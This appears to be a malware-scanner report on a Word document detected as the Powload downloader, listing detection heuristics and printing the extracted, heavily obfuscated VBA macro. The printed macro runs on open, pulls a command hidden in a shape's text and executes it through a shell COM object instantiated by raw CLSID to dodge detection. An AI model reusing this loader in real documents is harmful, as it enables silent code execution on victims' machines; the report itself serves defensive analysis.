MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Powload-6770836-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6770836-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
vJtCdr = 244440343 + CByte(lXpiQaprL - Sqr(MUsoB)) * vAJInwJ - JfuFNzXw * hlduuMwo / CDate(230627991) * 157094940 * 341266232 / (187077992 - Sin(241141116)) Set bJZMhfmkz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
vJtCdr = 244440343 + CByte(lXpiQaprL - Sqr(MUsoB)) * vAJInwJ - JfuFNzXw * hlduuMwo / CDate(230627991) * 157094940 * 341266232 / (187077992 - Sin(241141116)) Set bJZMhfmkz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7693 bytes |
SHA-256: 7f9a545c087e37fba3e90743e6afc571e94fb6290024b2690a317ad4bbf846ee |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
130 of 193 identifiers look randomly generated (e.g. 'VEXBVWNbs') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "dUwEOEHTNVszmI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case HSwlYD
Case 257757641
ktwci = 122407563
oBEMov = CVKNEqC
duDONW = 174492233
Case 195417733
iLiLuJo = ChrW(118414687)
tltuC = CDate(342035667)
iPcbKz = 319788673
End Select
QQBYP = 34205939 + CByte(OXjicMNHM - Sqr(vzzQais)) * wiHzC - iOiuiI * CzAXVO / CDate(132798842) * 154488641 * 29085208 / (140562981 - Sin(47931546))
On Error Resume Next
Select Case PGAvQJW
Case 16120916
MzVACum = 93186137
nWRkjYTZ = qPhEKGahm
YHWXG = 150069403
Case 130871712
ddNwRiOHP = ChrW(53480062)
WcbrMfn = CDate(319101424)
oOZUI = 225439692
End Select
cRzKNQaq = 313295866 + CByte(tzzpCrSC - Sqr(bzQKrT)) * LIPDtoj - mqPwRGBkv * mpzSmWH / CDate(118483228) * 294822573 * 42734003 / (287773345 - Sin(79917165))
Set qnESb = Shapes("VEwXcPHJQ")
On Error Resume Next
Select Case WCiCrK
Case 94959251
ZVpNW = 338396254
LCwuUlM = XYOzQDUXd
zLSiZs = 241308022
Case 17750352
oOYwONG = ChrW(280063780)
JvFaKJKi = CDate(192156672)
wBFwM = 305015506
End Select
oDhdGKR = 67835489 + CByte(dzZAmKM - Sqr(OhNYBITu)) * aEaiQL - rZCJF * lnQmf / CDate(74574645) * 33232748 * 187661887 / (160391988 - Sin(263751666))
On Error Resume Next
Select Case bCcSwItt
Case 62958939
qTfbQTYSq = 241712008
huwnG = kOztD
qMWqiKMTK = 212089469
Case 154779694
bjsuKFjv = ChrW(269225751)
uHjfsFIi = CDate(66601943)
nVoOt = 194479237
End Select
IdRqBWJMa = 72392160 + CByte(EtKHJJSOJ - Sqr(RHKfW)) * zFrdAjP - RXrslXS * uSaQrj / CDate(79700448) * 205082066 * 316594134 / (208433688 - Sin(132135653))
On Error Resume Next
Select Case XjTLjk
Case 272466793
iHoYSFt = 30910577
wwahHwOZ = HHAvw
RKkFTpj = 7829555
Case 166312401
zPFOo = ChrW(280412632)
GTdiXlQ = CDate(248379269)
mjchX = 259761430
End Select
MGIUn = 247324762 + CByte(MwBZJiIKL - Sqr(ducVtu)) * UUODDYr - KGsIjWqU * QlWLHDw / CDate(182868611) * 137068485 * 74934513 / (25246229 - Sin(195035003))
On Error Resume Next
Select Case vPJlFddU
Case 83662727
GrDRw = 161097481
miwzJ = LwWiJEvTr
aIWXqlkw = 173026373
Case 173062759
iobZdiJ = ChrW(159326751)
zmmVzojv = CDate(129334447)
RnOEcJ = 171647089
End Select
MAuAW = 231073262 + CByte(hIuJjZ - Sqr(vKnoWBZB)) * pcJJm - kzQDdz * mzPDAQj / CDate(270004175) * 249278613 * 257141300 / (283510404 - Sin(206443375))
NGHcX = "" + MjATXo + JozcQC + qnESb.TextFrame.TextRange.Text + nZBEIYNN + biNnGz + vwWWzl
On Error Resume Next
Select Case EFLQMF
Case 60402980
joEpW = 64204107
MDHAZ = nkSoBTpEI
jMsOzOtqT = 14010629
Case 238657475
FoFrBN = ChrW(250379425)
cUBaQV = CDate(299587719)
LlTzbsY = 187766084
End Select
uHwJRhX = 51601780 + CByte(idjJRcS - Sqr(TLLSwiUSi)) * iklMPcOH - nBKnd * qqPrCT / CDate(283450354) * 217961172 * 206113423 / (166769425 - Sin(87462931))
On Error Resume Next
Select Case ajUsY
Case 214145158
roHRp = 119799939
rAcul = dfhMTK
OwfKZazH = 276571149
Case 316614470
qQuUBzYw = ChrW(239035644)
FXZvzBdu = CDate(10672070)
YOzms = 58436433
End Select
rPSzBDsDV = 132102376 + CByte(ikoWa - Sqr(IaGPcZVMo)) * KcRHbsAj - RnETjrch * QRTCnEd / CDate(119055128) * 16611440 * 220984291 / (101507220 - Sin(275546596))
On Error Resume Next
Select Case aKcJPzvpp
Case 303616761
mqiYwQq = 332337074
GLDbHaXO = oKwJQD
NJBtaLCJZ = 196645553
Case 230287373
OhRUNspO = ChrW(47031918)
BoZhW = CDate(6763974)
ddZiajHp = 30767910
End Select
vJtCdr = 244440343 + CByte(lXpiQaprL - Sqr(MUsoB)) * vAJInwJ - JfuFNzXw * hlduuMwo / CDate(230627991) * 157094940 * 341266232 / (187077992 - Sin(241141116))
Set bJZMhfmkz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case mUrst
Case 186451845
vIQDrIjan = 163009547
CZYXzh = VijHnu
iYnrsbcRC = 6520647
Case 316895163
hjfYiU = ChrW(310809253)
bnjOV = CDate(62228553)
XzMnVWE = 55511792
End Select
sjvznkWX = 177402935 + CByte(AlpGCmrs - Sqr(vsYWiAF)) * qNapdX - fvZzOrQIo * IohqKBdd / CDate(212186606) * 86648906 * 278037853 / (132435848 - Sin(83846958))
On Error Resume Next
Select Case BlHJUCk
Case 111496066
jKppXQJl = 323244506
iiLurA = TjjksEFPD
VEXBVWNbs = 141762667
Case 256186244
uOCrcTtq = ChrW(277976096)
JaiAhE = CDate(283733543)
jZUao = 214065081
End Select
SNHzTzi = 48045115 + CByte(pViBcmVM - Sqr(FvwSUpIkl)) * NSTZVRJF - sXPiTBKL * qdwDHbi / CDate(240638640) * 191579159 * 604223 / (295659657 - Sin(121480391))
On Error Resume Next
Select Case nwsTzj
Case 233460576
CnFCkEiE = 179595011
IUQPnofEd = NcnzapW
wSpadiBBv = 236688675
Case 266889696
JLiMCvDX = ChrW(73742834)
nuGOb = CDate(171529493)
IbvhlGJFi = 282633276
End Select
OmtvPuLB = 300174018 + CByte(vflziui - Sqr(TODbBnItB)) * FZHTESJ - KsiMDZj * NwJiCLi / CDate(71392612) * 100343537 * 184342520 / (221827915 - Sin(252803337))
Const wtMkT = 0
On Error Resume Next
Select Case iGjXmlKnA
Case 331244510
laDnP = 157788500
tzFul = FoljNcXON
cAbKZPVni = 4150645
Case 247283387
KXBzfnpAu = ChrW(260927616)
mSzzbZY = CDate(174286658)
YdbnnNai = 184092140
End Select
LkLIiO = 224433025 + CByte(wkZMCo - Sqr(psbPuOK)) * zYjvNMS - KZcbkb * TltLb / CDate(274542214) * 98394300 * 81551298 / (178637397 - Sin(255809039))
bJZMhfmkz.Run@ NGHcX, wtMkT
On Error Resume Next
Select Case NEHTiuYJB
Case 294796856
DkoKE = 201904601
VonZQSdV = VwZhO
LSHPOiH = 107961806
Case 242020974
KCiVH = ChrW(296419237)
fUjDFn = CDate(264476594)
pNsDNcLu = 188883186
End Select
VDoQCOY = 20614948 + CByte(GPvzuch - Sqr(MiWFfTbYV)) * NXYwIF - lpaORVfCO * YuNwafhw / CDate(103105344) * 38646926 * 130561702 / (282964539 - Sin(235409846))
On Error Resume Next
Select Case RAZAaOlmq
Case 244152187
ASZiWtJO = 266942196
LSvBmTzH = KctmThnE
rbLWKLYH = 5540673
Case 232215129
aJKVQ = ChrW(35190852)
dznvmfCa = CDate(22551452)
jGzjp = 177185066
End Select
MVpHjdi = 121320173 + CByte(DNBRYW - Sqr(zJFvvp)) * UkIQbumU - inIuQatW * cWboY / CDate(247911660) * 232130652 * 66118830 / (291445427 - Sin(325336249))
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.